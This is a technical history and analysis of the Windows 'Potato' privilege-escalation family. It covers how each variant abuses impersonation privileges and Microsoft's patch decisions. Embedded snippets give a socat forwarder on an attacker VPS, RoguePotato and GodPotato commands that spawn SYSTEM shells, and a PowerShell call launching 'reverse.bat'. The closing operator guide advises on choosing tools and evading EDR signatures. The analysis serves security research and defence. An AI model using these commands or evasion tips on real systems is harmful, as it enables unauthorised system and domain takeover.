flowchart LR A[RoguePotato.exe on target] --> B[RPCSS sends OXID resolution to remote-host port 135] B --> C[Remote port forwarder on attacker VPS] C --> D[Forward to target on attacker-chosen port] D --> E[Fake OXID resolver inside RoguePotato] E --> F[Steer activation to SYSTEM-context COM server] F --> G[Named-pipe impersonation, CreateProcessWithToken, SYSTEM shell]

{// Step 1 -- on an attacker-controlled remote host (any internet-reachable VPS): const forwarder = "socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999"; // Step 2 -- on the target with SeImpersonatePrivilege: const exploit = 'RoguePotato.exe -r 10.0.0.3 -e "C:\\\\windows\\\\system32\\\\cmd.exe" -l 9999'; console.log("Remote forwarder:", forwarder); console.log("Target exploit :", exploit); console.log("Expected output : nt authority\\\\system");}

RoguePotato proved that the mitigation Microsoft chose did not break the underlying primitive. It only forced the attack to phone home. Two failure modes followed: in egress-filtered networks where outbound TCP 135 is blocked, the technique cannot run, and the remote forwarder is operationally noisy. Researchers needed a workaround that lived entirely on the target.

6.3 PrintSpoofer (Clément Labro, early May 2020)

Around the same time as RoguePotato, in early May 2020 (GitHub repository itm4n/PrintSpoofer created April 28, 2020; blog post first archived in the Wayback Machine on May 3, 2020), Clément Labro -- writing as itm4n -- published "PrintSpoofer -- Abusing Impersonation Privileges on Windows 10 and Server 2019" [@itm4n-printspoofer]. The mechanism uses no Distributed COM at all.

The Print Spooler service exposes an RPC call, RpcRemoteFindFirstPrinterChangeNotificationEx, that accepts a UNC path; the Spooler -- running as SYSTEM -- connects to that path to deliver printer-change notifications. Point the path at an attacker-owned named pipe; the Spooler connects; call ImpersonateNamedPipeClient; done [@itm4n-printspoofer]. Labro articulated the family's thesis statement in the post, attributing it to Decoder:

If you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM. -- attributed to Andrea Pierini (@decoder_it), quoted by Clément Labro in the PrintSpoofer writeup, May 2020 [@itm4n-printspoofer] sequenceDiagram participant Atk as PrintSpoofer (SeImpersonate holder) participant Pipe as Attacker-owned named pipe participant Spooler as Print Spooler (SYSTEM) Atk->>Pipe: Create named pipe and start accept loop Atk->>Spooler: RpcRemoteFindFirstPrinterChangeNotificationEx with attacker UNC Spooler->>Pipe: Connect to UNC path under SYSTEM context Pipe->>Atk: ImpersonateNamedPipeClient on server thread Atk->>Atk: CreateProcessWithToken spawns SYSTEM shell

This is the moment the architectural reading clicks. The family is not about Distributed COM activation. Closing DCOM would not close the family. The next variant would use Spooler RPC, the one after that would use the Encrypting File System RPC, and the one after that would use Microsoft Distributed Transaction Coordinator RPC. Forshaw's contemporaneous April 2020 tiraniddo.dev post on shared logon sessions makes the same architectural point from a different angle [@forshaw-tiraniddo-2020].

Key idea: The Potato family is about the primitive, not the vehicle. SeImpersonatePrivilege plus ImpersonateNamedPipeClient plus any SYSTEM-context Windows service with a callback-style API equals SYSTEM. Closing one vehicle (Distributed COM activation) leaves every other vehicle (Spooler RPC, EFS RPC, the next service that gets a callback interface) wide open [@itm4n-printspoofer; @forshaw-tiraniddo-2020].

6.4 RemotePotato0 and the "Won't Fix"

In April 2021, Cocomazzi and Pierini pushed the technique across the network in a SentinelLabs post titled "Relaying Potatoes: DCE/RPC NTLM Relay EoP" [@sentinellabs-relaying]. The repository tagline names the outcome bluntly: "Just another 'Won't Fix' Windows Privilege Escalation from User to Domain Admin" [@antonio-remote].

The mechanism is cross-session NTLM relay over Distributed COM and RPC. An unprivileged local user triggers the Distributed COM activation service to make another user logged on the same machine (typically an administrator in an interactive RDP session) authenticate via NTLM. The captured NTLM exchange is then cross-protocol relayed (RPC to LDAP, with a port forwarder bridging the gap) to a domain controller with LDAP signing disabled. The attacker writes their own account into a privileged group or registers resource-based constrained delegation, and the engagement is over [@sentinellabs-relaying].

Microsoft's response is the most quoted sentence in the family's history:

The current status of this vulnerability is 'won't fix' ... Although Microsoft considers the vulnerability an important privilege escalation, it has been classified as 'Won't Fix'. -- SentinelLabs disclosure of RemotePotato0, April 2021 [@sentinellabs-relaying]

Note: RemotePotato0 was a fully working exploit chain that promoted any local low-privilege user to Domain Admin. Microsoft was given the disclosure, replicated the technique, and declined to issue a CVE. This is the moment the architectural reading stops being a researcher narrative and becomes a documented MSRC decision [@sentinellabs-relaying]. Microsoft eventually shipped a partial mitigation in October 2022 that broke the RPC-to-LDAP scenario specifically, but the underlying primitive survives in adjacent variants [@antonio-remote].

6.5 The CVE-2021-26414 Distributed COM hardening rollout

Two months after the RemotePotato0 disclosure, Microsoft began the only DCOM-side hardening it would ship under a CVE. KB5004442 documents a three-phase rollout, quoted verbatim from the article: "The first phase of DCOM updates was released on June 8, 2021. In that update, DCOM hardening was disabled by default. ... The second phase of DCOM updates was released on June 14, 2022. ... The final phase of DCOM updates will be released in March 2023. It will keep the DCOM hardening enabled and remove the ability to disable it" [@ms-kb5004442].

Phase	Date	Behaviour
Phase 1	June 8, 2021	DCOM hardening shipped, disabled by default. Administrators may opt in via registry.
Phase 2	June 14, 2022	Hardening enabled by default. Registry opt-out still available.
Phase 3	March 14, 2023	Hardening enforced with no opt-out. The `RPC_C_AUTHN_LEVEL_PKT_INTEGRITY` minimum is mandatory.

The RPC authentication-level constant that requires every packet of an RPC exchange to be signed for integrity (level 5 of 6). CVE-2021-26414 raises the *minimum* DCOM activation authentication level to this constant, rejecting legacy Distributed COM clients that activate at lower levels. The full rejection appears in Windows Event ID 10036 as "The server-side authentication level policy does not allow the user %1\\%2 SID (%3) from address %4 to activate DCOM server. Please raise the activation authentication level at least to RPC_C_AUTHN_LEVEL_PKT_INTEGRITY in client application" [@ms-kb5004442].

The hardening raised the bar for legacy Distributed COM client authentication. It did not declare Distributed COM activation a security boundary [@ms-kb5004442; @ms-techcommunity-dcom]. The "Manage changes" framing in the KB title is deliberate: this is a compatibility migration with telemetry events (10036 server-side, 10037 and 10038 client-side) so enterprises can find legacy clients before the final cut [@ms-kb5004442].

Note: Distributed COM is everywhere in Windows. Removing the ability to activate at a lower authentication level breaks legacy Distributed COM applications that have not been updated since at least 2014. Microsoft's 21-month rollout window between Phase 1 (June 2021) and Phase 3 (March 2023) was a compatibility migration -- the telemetry events let enterprise IT find and fix the legacy clients before the final cut [@ms-kb5004442; @ms-techcommunity-dcom]. The hardening is the most aggressive Distributed COM mitigation Microsoft has ever shipped, and even so it does not declare Distributed COM activation a security boundary.

Researchers had 21 months to find a way around it. They took 18.

6.6 JuicyPotatoNG (Pierini + Cocomazzi, September 21, 2022)

Pierini and Cocomazzi returned on September 21, 2022, with JuicyPotatoNG -- the last pre-Phase-3 Distributed COM activation variant [@decoder-juicyng]. The blog post is titled "Giving JuicyPotato a second chance: JuicyPotatoNG" and walks through three counter-moves combined into a single binary [@decoder-juicyng; @antonio-juicyng].

First, the tool embeds Forshaw's October 2021 local-OXID trick. Forshaw had shown that an OXID resolution request could be answered by a local Distributed COM server on a randomly selected port, dropping the need for an external forwarder [@forshaw-pz-2021]. JuicyPotatoNG ships that trick as a default. Second, it falls back to a tight set of usable class identifiers; the default is {854A20FB-2D44-457D-992F-EF13785D2B51}, the PrintNotify class [@antonio-juicyng]. Third, it calls LogonUser with LOGON32_LOGON_NEW_CREDENTIALS to sidestep the INTERACTIVE-group restriction that constrained earlier post-RoguePotato attempts [@decoder-juicyng].

The cross-pollination is worth marking. Forshaw's October 2021 Project Zero post on relaying Distributed COM authentication described the local-OXID trick as a research result [@forshaw-pz-2021]. Pierini and Cocomazzi picked it up eleven months later and shipped it as the default mode of JuicyPotatoNG [@decoder-juicyng]. SilverPotato (April 2024) and the Compass Security follow-on (September 2024) cite the same trick [@compass-three-headed]. Forshaw's blog has been the unofficial reference implementation for the lineage's offensive primitives for half its lifetime.

JuicyPotatoNG also implements a Security Support Provider Interface (SSPI) hook on AcceptSecurityContext to capture the SYSTEM token without requiring RpcImpersonateClient. The effect is to make the tool work for both SeImpersonate and SeAssignPrimaryToken holders [@decoder-juicyng]. The result is a clean, single-binary, no-external-infrastructure local-DCOM-activation exploit -- which is the version that worked between Phase 2 (June 14, 2022, enabled by default) and Phase 3 (March 14, 2023, enforced with no opt-out) of the CVE-2021-26414 rollout [@ms-kb5004442].

The next variant would need to survive Phase 3.

6.7 GodPotato (BeichenDream, December 23, 2022)

Three months after JuicyPotatoNG, on December 23, 2022, the Chinese-speaking researcher BeichenDream published GodPotato to GitHub [@beichendream-god]. The README is bilingual English and Chinese, and it opens with a precise summary of where the variant fits in the lineage:

Based on the history of Potato privilege escalation for 6 years, from the beginning of RottenPotato to the end of JuicyPotatoNG, I discovered a new technology by researching DCOM, which enables privilege escalation in Windows 2012 - Windows 2022 ... There are some defects in rpcss when dealing with oxid, and rpcss is a service that must be opened by the system, so it can run on almost any Windows OS, I named it GodPotato. -- BeichenDream, GodPotato README, December 2022 [@beichendream-god]

The mechanism manipulates the OXID-handling flow inside RPCSS so the activated Distributed COM server's authentication callback returns to a tool-controlled endpoint without requiring the OXID resolver to be redirected. Because the redirect itself is what the CVE-2021-26414 hardening rejects, GodPotato sidesteps the hardening entirely [@beichendream-god]. RPCSS is a mandatory Windows service -- it cannot be disabled without breaking the operating system -- so the technique works on every supported Windows release as of disclosure.

{// On a target host where the calling account holds SeImpersonatePrivilege // (default for every IIS app-pool identity, MSSQL service account, BITS account, etc.) const command = 'GodPotato -cmd "cmd /c whoami"'; console.log("Run:", command); console.log("Expected output: nt authority\\\\system"); console.log("Working OS coverage: Windows 8 through Windows 11; Server 2012 through Server 2025"); console.log("Underlying primitive: RPCSS OXID-handling defect, no external infra, single binary");}

Microsoft has not assigned a CVE to the underlying RPCSS defect [@beichendream-god; @compass-three-headed].Apache 2.0 licensing matters here: red-team operators routinely recompile GodPotato from source to bypass binary-hash signatures, and the permissive license makes redistribution unproblematic [@beichendream-god]. The pattern is consistent with the servicing-criteria reading. GodPotato is in May 2026 the practitioner default on every in-support Windows release: single binary, no external infrastructure, no separate OXID resolver, Apache-2.0-licensed and freely re-buildable when EDR vendors signature the public binary [@beichendream-god].

Key idea: GodPotato survives every Microsoft mitigation because Microsoft has not declared the underlying primitive a security boundary. Three named hardening waves (the 2019-2020 OXID-resolver change, the three-phase CVE-2021-26414 rollout from June 2021 to March 2023, and the per-variant CVE patches in 2023 and 2024) leave GodPotato working on Server 2025 and Windows 11 24H2 as of this writing [@beichendream-god; @ms-kb5004442; @compass-three-headed].

6.8 LocalPotato and CVE-2023-21746

Three weeks after GodPotato landed, Microsoft assigned the first-ever CVE in the local Potato lineage. The variant was LocalPotato, the CVE was CVE-2023-21746, and the patch shipped in the January 2023 Patch Tuesday [@nvd-cve-2023-21746; @msrc-cve-2023-21746]. The Decoder writeup, published February 13, 2023, walks through the timeline:

"We reported our findings to the Microsoft Security Response Center (MSRC) on September 9, 2022, and it was resolved with the release of the January 2023 patch Tuesday and assigned the CVE number CVE-2023-21746." -- Andrea Pierini, "LocalPotato" writeup, February 2023 [@decoder-localpotato]

LocalPotato is not a Distributed COM activation Potato. It attacks the local NTLM authentication protocol itself. During a local NTLM exchange, the Type 2 (Challenge) message carries a "Reserved" field that, in the local-NTLM case, encodes the upper bytes of the local server context handle the client should associate with. By racing two simultaneous local NTLM authentications -- one privileged client to attacker server, one attacker client to a real local server -- and swapping the Reserved fields in the two Type 2 messages, LSASS binds the privileged identity to the attacker's low-privilege context [@decoder-localpotato; @localpotato-com]. The result is an arbitrary file-read and file-write primitive that chains cleanly to SYSTEM.

Note: Pierini and Cocomazzi had been pushing on the architectural carve-out for seven years before they got a CVE. The boundary that made the difference: LocalPotato attacks the local user-to-local-user NTLM authentication context, which is on the servicing-criteria boundary list. The underlying SeImpersonate-to-SYSTEM primitive is not. Microsoft will service the parts of the protocol that are inside the boundary; it will not service the parts that are outside [@decoder-localpotato; @msrc-servicing-criteria].

The LocalPotato writeup credits Elad Shamir for the original hint that started the research [@decoder-localpotato]. The dedicated companion site localpotato.com carries the canonical title "LocalPotato -- When swapping the context leads you to SYSTEM" and links the CVE [@localpotato-com].

6.9 SilverPotato (Pierini + Cocomazzi, April 24, 2024)

A year later, on April 24, 2024, Pierini and Cocomazzi extended the cross-session Distributed COM activation primitive that RemotePotato0 had pioneered into a fully practical domain attack. The blog post title is "Hello, I'm your domain admin and I want to authenticate against you" [@decoder-silverpotato]. The Troopers 24 abstract refers to the technique by its other name, ADCSCoercePotato [@troopers24; @decoder-adcs-coerce-repo]; both names refer to the same primitive.

The mechanism: members of the Distributed COM Users or Performance Log Users built-in groups can remotely trigger an NTLM authentication from any user currently logged on the target server -- including a Domain Administrator on a Domain Controller -- and relay it. The specific vehicle is the sppui Distributed COM application (class identifier F87B28F1-DA9A-4F35-8EC0-800EFCF26B83, "SPPUIObjectInteractive Class", hosted in slui.exe), which runs under the Interactive User identity [@decoder-silverpotato]. Pierini's wording in the post is unsparing:

"Members of Distributed COM Users or Performance Log Users Groups can trigger from remote and relay the authentication of users connected on the target server, including Domain Controllers." -- Andrea Pierini, "SilverPotato" writeup, April 2024 [@decoder-silverpotato]

The captured authentication is relayed via ntlmrelayx to AD CS Web Enrollment or LDAP, then chained with ForgeCert and Rubeus into a full Domain Admin Kerberos TGT [@decoder-silverpotato]. The Compass Security follow-on from September 2024 extends the chain further by modifying the KrbRelay project to make it remote and cross-session capable: "I modified the KrbRelay project to make it remote and cross-session capable, because Andrea did not release his PoC code ... DCOM hardening only allows relay to HTTP or unprotected LDAP" [@compass-three-headed]. Tianze Ding's Black Hat Asia 2024 talk on "CertifiedDCOM" landed in the same window [@blackhat-asia-2024]. Pierini's February 2024 post on the ADCS server side of the same surface foreshadowed the chain a few weeks earlier [@decoder-adcs-server].

flowchart LR A[Member of Distributed COM Users on target DC] --> B[Cross-session DCOM activation against sppui CLSID] B --> C[Logged-on Domain Admin session authenticates via NTLM] C --> D[ntlmrelayx forwards NTLM to AD CS Web Enrollment] D --> E[Computer-template certificate issued] E --> F[ForgeCert and Rubeus mint Domain Admin Kerberos TGT] F --> G[Domain compromise]

Note: The Troopers 24 abstract describes SilverPotato as "still in review by MSRC" as of June 2024 [@troopers24]. The Compass Security follow-on demonstrates a working end-to-end chain four months later [@compass-three-headed]. The default Distributed COM group memberships on Domain Controllers that grant the activation rights SilverPotato weaponises have not changed in any shipping Windows release as of May 2026. No CVE has been assigned [@decoder-silverpotato; @troopers24].

6.10 FakePotato and CVE-2024-38100

Four months after SilverPotato, on August 2, 2024, Pierini published the most recent named variant. He called it FakePotato, and he was up front about the name:

"You might be wondering why I called it the 'Fake' Potato. Initially, I thought it could be exploited using the same techniques as the *Potato families, but it turned out to be different and much simpler in this case." -- Andrea Pierini, "The Fake Potato" writeup, August 2024 [@decoder-fakepotato]

FakePotato abuses the ShellWindows Distributed COM application (AppID {9BA05972-F6A8-11CF-A442-00A0C90A8F39}), hosted in explorer.exe and registered to run under the Interactive User identity. Cross-session activation via BindToMoniker("session:N!new:<CLSID>") invokes ShellExecute in the target session. There is no NTLM relay, no token impersonation, no SeImpersonatePrivilege requirement -- any Authenticated User suffices because explorer.exe in High Integrity Level (UAC-disabled administrator) granted the Authenticated Users group execute permission via the DCOM Access Security ACL [@decoder-fakepotato].

{$obj = [System.Runtime.InteropServices.Marshal]::BindToMoniker("session:2!new:9BA05972-F6A8-11CF-A442-00A0C90A8F39") $p = $obj.item(0).document.application $p.ShellExecute("c:\\temp\\reverse.bat", "", "c:\\windows", $null, 0)}

Microsoft assigned CVE-2024-38100 and shipped the patch in the July 2024 Patch Tuesday cumulative updates on July 9, 2024 (KB5040434 for Windows 10 1607 / Windows Server 2016; equivalent KBs for Windows 11, Server 2019, Server 2022, and Server 2025) -- four weeks before the public disclosure [@decoder-fakepotato; @nvd-cve-2024-38100; @msrc-cve-2024-38100]. The patch corrects the explorer.exe ACL in High Integrity Level contexts so the Authenticated Users permission required for activation is no longer granted. The underlying cross-session Distributed COM activation primitive that SilverPotato and FakePotato share is untouched [@decoder-silverpotato; @decoder-fakepotato].

FakePotato is not, in the relay sense, a Potato at all. It is a misconfiguration of the ShellWindows Distributed COM application's permissions in High Integrity Level contexts [@decoder-fakepotato]. Pierini's "Fake" framing acknowledges the divergence from the NTLM-reflection pattern that defined the family from RottenPotato through GodPotato. The naming choice is itself a small piece of taxonomy: not every member of the family is a token-relay exploit, even if every member exploits the same architectural carve-out.

After nearly a decade of patching specific vehicles and refusing to declare the underlying primitive a boundary, Microsoft's pattern is hard to miss.

7. Eleven Variants at a Glance

Nine years of named-variant disclosures, eleven named variants, one architectural argument. The table below is sourced cell by cell from the preceding sections.

Variant	Date	Authors	Coercion vehicle	Mitigation it bypassed	Microsoft response	Still works in 2026?
HotPotato [@foxglove-hotpotato]	Jan 16, 2016	Stephen Breen	NBNS spoof + WPAD + HTTP-to-SMB relay	MS08-068 same-protocol-only fix	None named; EPA/SMB hardening eventually closed the vehicle	Only on pre-1607 builds
RottenPotato [@foxglove-rottenpotato]	Sep 23, 2016	Stephen Breen + Chris Mallz	DCOM activation via BITS CLSID on 127.0.0.1:6666	(none yet)	None	Only pre-1809 builds
RottenPotatoNG [@breenmachine-rottenng]	Dec 29, 2017	breenmachine	Same as RottenPotato (C++ port; no Metasploit)	(none yet)	None	Only pre-1809 builds
JuicyPotato [@ohpe-juicy]	Jul 27, 2018	Andrea Pierini + Giuseppe Trotta	Generalised DCOM activation; CLSID matrix	(none yet)	OXID-resolver hard-coding in Win10 1809 / Server 2019 [@forshaw-pz-2021]	Only pre-1809 builds
RoguePotato [@antonio-rogue]	May 10, 2020	Antonio Cocomazzi + Andrea Pierini	DCOM activation through remote TCP-135 forwarder	2019-2020 OXID-resolver hardening	None (no CVE)	Only pre-Phase-3 builds
PrintSpoofer [@itm4n-printspoofer]	Early May 2020	Clément Labro	Print Spooler RPC `RpcRemoteFindFirstPrinterChangeNotificationEx`	All DCOM-side hardening (irrelevant)	None (no CVE)	Yes, when Spooler is running
RemotePotato0 [@sentinellabs-relaying]	Apr 2021	Antonio Cocomazzi + Andrea Pierini	Cross-session DCOM/RPC NTLM relay	(defines a new threat surface)	"Won't Fix"; partial Oct 2022 RPC-to-LDAP mitigation	Partially (primitive intact)
JuicyPotatoNG [@antonio-juicyng; @decoder-juicyng]	Sep 21, 2022	Andrea Pierini + Antonio Cocomazzi	Local-OXID trick + LogonUser NewCredentials	CVE-2021-26414 Phase 1 and Phase 2	None (no CVE)	Only pre-Phase-3 builds
GodPotato [@beichendream-god]	Dec 23, 2022	BeichenDream	RPCSS OXID-handling defect (no resolver redirect)	All three CVE-2021-26414 phases	None (no CVE)	Yes -- the 2026 default
LocalPotato / CVE-2023-21746 [@decoder-localpotato; @nvd-cve-2023-21746]	Patched Jan 10, 2023	Andrea Pierini + Antonio Cocomazzi	NTLM Type-2 "Reserved" field context swap	(orthogonal -- attacks LSASS)	CVE-2023-21746 (first local-Potato CVE)	No -- patched
SilverPotato / ADCSCoercePotato [@decoder-silverpotato; @troopers24]	Apr 24, 2024	Andrea Pierini + Antonio Cocomazzi	Cross-session DCOM against `sppui` AppID	Post-RemotePotato0 partial mitigations	Still in review by MSRC as of mid-2026	Yes -- unpatched
FakePotato / CVE-2024-38100 [@decoder-fakepotato; @nvd-cve-2024-38100]	Disclosed Aug 2, 2024	Andrea Pierini	Cross-session DCOM against `ShellWindows` AppID (ACL bug)	(orthogonal)	CVE-2024-38100 in the July 2024 Patch Tuesday (KB5040434 for 1607/Server 2016; per-build KBs elsewhere)	No -- patched

Two CVEs in nine years of named-variant disclosures. One "Won't Fix" decision on a working Domain Admin escalation. Zero declarations of SeImpersonatePrivilege or Distributed COM activation as a security boundary. The pattern is consistent across every column [@troopers24; @msrc-servicing-criteria].

Key idea: Two CVEs in a decade, against a family with eleven named variants. The first CVE was for a piece of the local NTLM protocol that is on the servicing-criteria list, not for the underlying SeImpersonate-to-SYSTEM primitive. The second was for a Distributed COM access-control list misconfiguration, not for cross-session activation as a class. Microsoft will assign CVEs to specific vehicles when forced. It will not declare the architectural primitive a security boundary [@nvd-cve-2023-21746; @nvd-cve-2024-38100; @troopers24].

8. The 2026 Decision Surface

In May 2026, an operator with SeImpersonatePrivilege on a default Windows 11 box has a small menu of working tools, plus three legacy variants that remain useful on unpatched fleets. The current toolkit:

Method	Coercion vehicle	OS coverage	When to use it
GodPotato [@beichendream-god]	RPCSS OXID defect	Win 8 to Win 11; Server 2012 to Server 2025	Default first try on any in-support Windows
SweetPotato [@ccob-sweet]	Selectable: PrintSpoofer (default), DCOM, EfsRpc, WinRM	Win 7+ depending on selected mode	When GodPotato's binary signature is blocked
SharpEfsPotato [@bugch3ck-efs]	EFS RPC (`EfsRpcOpenFileRaw`)	Server 2019+, Win 10/11 with EFS RPC enabled	DCOM locked down and Spooler disabled
PrintSpoofer [@itm4n-printspoofer]	Print Spooler RPC	Any host with Spooler running	The lowest-noise option on Spooler-enabled hosts
JuicyPotatoNG [@antonio-juicyng]	Local-OXID + legacy CLSID	Pre-Phase-3 DCOM hardening only	Corporate fleets with delayed CVE-2021-26414 rollout
RoguePotato [@antonio-rogue]	Remote TCP-135 forwarder	Pre-Phase-3 DCOM hardening	Pre-2022 hardened-OXID-only systems with attacker remote infra
SilverPotato [@decoder-silverpotato]	Cross-session DCOM against DC	Default DCs with `Distributed COM Users` or `Performance Log Users` membership	Domain-tier escalation -- the only currently-unpatched cross-session variant

Plus three legacy variants worth knowing about: JuicyPotato on pre-1809 builds, RottenPotato on Server 2008 R2 / Windows 7 ESU-eligible builds, and HotPotato as the canonical naming origin and the source of the family's "documented Win32 calls" framing [@ohpe-juicy; @foxglove-rotten-repo; @foxglove-hotpotato]. Embedded Windows builds (Windows 10 IoT LTSC 2019, some industrial controllers, ATM images) frequently fall behind the OXID-resolver mitigation and remain JuicyPotato-vulnerable through 2026.

SharpEfsPotato's canonical repository is `github.com/bugch3ck/SharpEfsPotato` [@bugch3ck-efs]. A widely shared `ly4k/SharpEfsPotato` fork exists and is referenced in some red-team writeups, but the upstream is the `bugch3ck` repo per the README's own credit chain ("Built from SweetPotato by @\_EthicalChaos\_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0") [@bugch3ck-efs]. Operators citing the `ly4k` URL are pointing at a fork.

Every one of these tools has a Microsoft mitigation in its history. None of those mitigations closed the family. The next section asks what mitigation could.

9. What Would It Take To Close the Family?

A counterfactual sharpens the question. Suppose Microsoft decided in 2026 that the family must end. Three closure options exist, and each carries a compatibility cost.

Closure option	Mechanism	Compatibility cost
1. Declare `SeImpersonatePrivilege` a security boundary	Revoke the privilege from default service accounts (IIS app pools, SQL Server, BITS, Task Scheduler, the Spooler)	Operationally prohibitive: thousands of third-party services depend on the default grant
2. Declare Distributed COM activation a security boundary	Validate the activator's identity against the activated CLSID's registered identity on every activation	Breaks 25 years of legacy Distributed COM applications written between 1996 and 2021 [@ms-dcom-spec]
3. Deprecate `ImpersonateNamedPipeClient` as a Win32 primitive	Remove the call from `namedpipeapi.h` or gate it behind a Trustlet validation	Breaks parts of CSRSS, the console subsystem, and LSASS itself; no deprecation notice exists in the API reference as of mid-2026 [@ms-impersonate-api]

The CVE-2021-26414 hardening creeps toward option 2 for remote Distributed COM but explicitly does not for local Distributed COM [@ms-kb5004442]. The Adminless direction in Windows 11 24H2 -- Microsoft's "Administrator protection" platform feature, currently a preview shipped first via Windows Insider builds and not yet generally available [@ms-administrator-protection] -- introduces a per-application admin-elevation gate, but operates above the SYSTEM-impersonation primitive, not below it. Credential Guard isolates LSASS secrets in a Virtualization-Based Security Trustlet -- which protects NTLM hashes from extraction but does not gate ImpersonateNamedPipeClient or SeImpersonatePrivilege [@ms-credential-guard]. Smart App Control restricts arbitrary binary execution but does not block in-process exploitation by a SYSTEM-running service [@ms-smart-app-control].

The lower bound on attack cost is therefore O(1) per invocation, and it stays O(1) as long as the servicing-criteria carve-out holds. No combination of currently-shipping mitigations moves it.

Key idea: The Potato family is a fixed point of the current Windows architecture. Every closure option carries a compatibility cost that no currently-announced Microsoft release accepts. Until the MSRC Windows Security Servicing Criteria changes the position on SeImpersonatePrivilege and Distributed COM activation, the family's lower attack cost is O(1) and no servicing patch can move it [@msrc-servicing-criteria; @troopers24].

The claim is empirical, not formal. A "fixed point" in the algorithmic sense is a value where a function returns its own input. For the Potato family the analogue is: every Microsoft mitigation that does not change the servicing-criteria document returns a family that is still alive. The fixed-point status is consistent with eleven variants over nine years of named-variant disclosures (HotPotato January 2016 -> FakePotato August 2024) against three named hardening waves. It would be invalidated by a major-version Windows release that explicitly revoked the default `SeImpersonatePrivilege` grant on service accounts. No such release is on the public roadmap as of May 2026 [@msrc-servicing-criteria].

10. Open Problems

Five questions sit at the research frontier in 2026.

The next coercion vehicle. Each Potato variant is one SYSTEM-context service with a callback-style API. As the family has matured, researchers have mapped a growing surface of candidates: EFS RPC (which SharpEfsPotato already weaponises [@bugch3ck-efs]), Print Spooler async RPC (MS-PAR), Windows Search remote protocol (MS-WSP), and Microsoft Distributed Transaction Coordinator RPC. The community-empirical conjecture, repeated across Troopers 24 [@troopers24] and the Compass Security retrospective [@compass-three-headed], is that any SYSTEM-context Windows service with a callback-style API becomes a Potato vehicle within roughly eighteen months of operational need.

The "eighteen-month vehicle cadence" is an informal community claim, not a measured statistic. It originates in the Troopers 24 retrospective by Pierini and Cocomazzi [@troopers24] and is reinforced by the Compass Security follow-on documenting how the SilverPotato chain was productised within months of Pierini's February 2024 ADCS-server post [@decoder-adcs-server; @compass-three-headed]. The number should be read as a rule of thumb, not a benchmark.

Linux and Windows Subsystem for Linux extension. No Linux analogue of SeImpersonatePrivilege exists. There are partial precedents in the impacket cross-protocol relay work, but no Potato-class primitive that produces a SYSTEM token on a Linux host. Open.

Will defence-in-depth combine to close the family without ever declaring a new boundary? Microsoft has shipped Credential Guard [@ms-credential-guard], Hypervisor-Protected Code Integrity [@ms-hvci], Smart App Control [@ms-smart-app-control], and the experimental Administrator-protection direction in Windows 11 24H2 [@ms-administrator-protection]. Each changes the runtime trust model in some way. No combination of currently-shipping technologies closes the family as of May 2026 -- the Potato primitives live below the layer those technologies operate on [@troopers24; @compass-three-headed].

A defensive detection primitive that catches every variant. The unifying invariant is ImpersonateNamedPipeClient being called from a thread that holds SeImpersonatePrivilege against a named pipe that has just received a SYSTEM-context authentication originating from a service the calling process did not initiate. Per-variant detection rules exist for each named tool (GodPotato, PrintSpoofer, JuicyPotato). A generalising rule has not been published [@ms-impersonate-api]. The informal community position is that the family is non-detectable as a class because the primitive is in the legitimate hot path of nearly every Windows service.

MSRC servicing-criteria position on cross-session Distributed COM activation. LocalPotato (CVE-2023-21746) received a CVE for a piece of the local NTLM protocol [@nvd-cve-2023-21746]. FakePotato (CVE-2024-38100) received a CVE for an access-control list misconfiguration on the ShellWindows AppID [@nvd-cve-2024-38100]. SilverPotato is still unpatched [@decoder-silverpotato; @troopers24]. The boundary that distinguishes these three is unclear: why was the ShellWindows cross-session activation patched while the sppui cross-session activation has not been? The answer determines the next decade of the family. The defensible reading is that Microsoft will service variants that look like permission misconfigurations on a single AppID but not the underlying cross-session Distributed COM activation primitive itself.

11. How to Use a Potato in 2026

The practitioner question is operational. Given a foothold and a goal, which Potato variant does the job? The decision tree below walks through the path researchers settle into on red-team engagements.

The first-try heuristic is short. GodPotato first, because it is the single binary that works on every in-support Windows release [@beichendream-god]. If the GodPotato binary signature is blocked by Endpoint Detection and Response, SweetPotato with -e PrintSpoofer (or -e EfsRpc on a Domain Controller where Spooler is off) [@ccob-sweet]. If both are blocked, SharpEfsPotato as the lower-public-exposure third choice [@bugch3ck-efs]. For pre-2023 unpatched fleets, JuicyPotatoNG during the Phase-2 hardening window and JuicyPotato on pre-1809 builds [@antonio-juicyng; @ohpe-juicy]. For domain escalation against a DC, SilverPotato with the Compass Security KrbRelay modifications [@decoder-silverpotato; @compass-three-headed].

Note: GodPotato. If signature-blocked, SweetPotato with -e PrintSpoofer. If both blocked, SharpEfsPotato. The rest of the family is for situations the first three do not cover (legacy fleets, DC escalation, technique illustration of patched variants) [@beichendream-god; @ccob-sweet; @bugch3ck-efs].

Several implementation pitfalls catch new operators. The named-pipe path that GodPotato uses (\pipe\<token>\pipe\epmapper) is widely signatured by EDR vendors -- see the detection-engineering Spoiler below for the specific Sigma and Elastic rules [@sigma-potato-hktl; @elastic-rogue-pipe] -- and recompiling from source with a different pipe template is the standard countermeasure. A token holding SeImpersonatePrivilege does not necessarily enable it -- explicit AdjustTokenPrivileges with SE_PRIVILEGE_ENABLED is required, and custom adaptations frequently miss the step [@ms-adjusttokenprivileges]. SweetPotato's default -e PrintSpoofer mode fails silently on a Domain Controller where Spooler is disabled per the PrintNightmare aftermath; the correct DC default is GodPotato or SharpEfsPotato. RoguePotato's outbound TCP 135 to attacker infrastructure is blocked by default in most enterprise networks. FakePotato and SilverPotato both require the victim identity to be actively logged in, since both depend on a live cross-session activation surface [@itm4n-printspoofer; @antonio-rogue; @decoder-silverpotato; @decoder-fakepotato].

